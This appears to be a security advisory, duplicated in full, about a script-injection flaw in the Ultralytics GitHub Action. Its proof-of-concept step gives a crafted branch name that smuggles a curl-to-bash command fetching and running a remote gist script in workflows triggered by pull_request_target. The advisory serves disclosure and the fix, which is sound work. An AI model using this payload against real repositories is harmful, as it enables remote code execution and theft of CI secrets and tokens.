Summary
The Ultralytics action available at https://github.com/marketplace/actions/ultralytics-actions is vulnerable to GitHub Actions script injection. If anyone uses the action within a workflow that runs on the pull_request_target
trigger, then that an attacker can inject arbitrary code into that workflow using a crafted branch name.
Details
The issue exists because the action.yml
is a composite action and uses certain fields by GitHub context expression within a run
step:
echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}"
echo "github.ref: ${{ github.ref }}"
echo "github.head_ref: ${{ github.head_ref }}"
echo "github.base_ref: ${{ github.base_ref }}"
In this case, github.head_ref
and github.event.pull_request.head.ref
are user controlled and can be used to inject code.
PoC
-
Create a fork of any repository that uses ultralytics/actions
within a workflow that runs on pull_request_target
.
-
In the fork create a branch as an injection payload, e.g.: Hacked";{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/6dc549d083b2da1a54d22cc4feac53a4/raw/4b7499772c53085aeedf459d822aee277b5f17a0/poc.sh}${IFS}|${IFS}bash
-
Create a draft pull request.
-
If the action is reachable, then achieve arbitrary code execution.
See my full POC here (https://github.com/AdnaneKhan/Ultralytics_POC/actions/runs/9733997201 and https://github.com/AdnaneKhan/Ultralytics_POC), where I created a test workflow that used the action and achieved arbitrary execution using another account by creating a pull request from a fork.
Impact
Any workflow that uses the action and runs on pull_request_target
is vulnerable to arbitrary code execution within the context of the base branch. An attacker can use this to abuse the GITHUB_TOKEN
or steal secrets from the workflow.
Fix
Sanitize the user-controlled variables using environment vars.
Summary
The Ultralytics action available at https://github.com/marketplace/actions/ultralytics-actions is vulnerable to GitHub Actions script injection. If anyone uses the action within a workflow that runs on the
pull_request_target
trigger, then that an attacker can inject arbitrary code into that workflow using a crafted branch name.Details
The issue exists because the
action.yml
is a composite action and uses certain fields by GitHub context expression within arun
step:In this case,
github.head_ref
andgithub.event.pull_request.head.ref
are user controlled and can be used to inject code.PoC
Create a fork of any repository that uses
ultralytics/actions
within a workflow that runs onpull_request_target
.In the fork create a branch as an injection payload, e.g.:
Hacked";{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/6dc549d083b2da1a54d22cc4feac53a4/raw/4b7499772c53085aeedf459d822aee277b5f17a0/poc.sh}${IFS}|${IFS}bash
Create a draft pull request.
If the action is reachable, then achieve arbitrary code execution.
See my full POC here (https://github.com/AdnaneKhan/Ultralytics_POC/actions/runs/9733997201 and https://github.com/AdnaneKhan/Ultralytics_POC), where I created a test workflow that used the action and achieved arbitrary execution using another account by creating a pull request from a fork.
Impact
Any workflow that uses the action and runs on
pull_request_target
is vulnerable to arbitrary code execution within the context of the base branch. An attacker can use this to abuse theGITHUB_TOKEN
or steal secrets from the workflow.Fix
Sanitize the user-controlled variables using environment vars.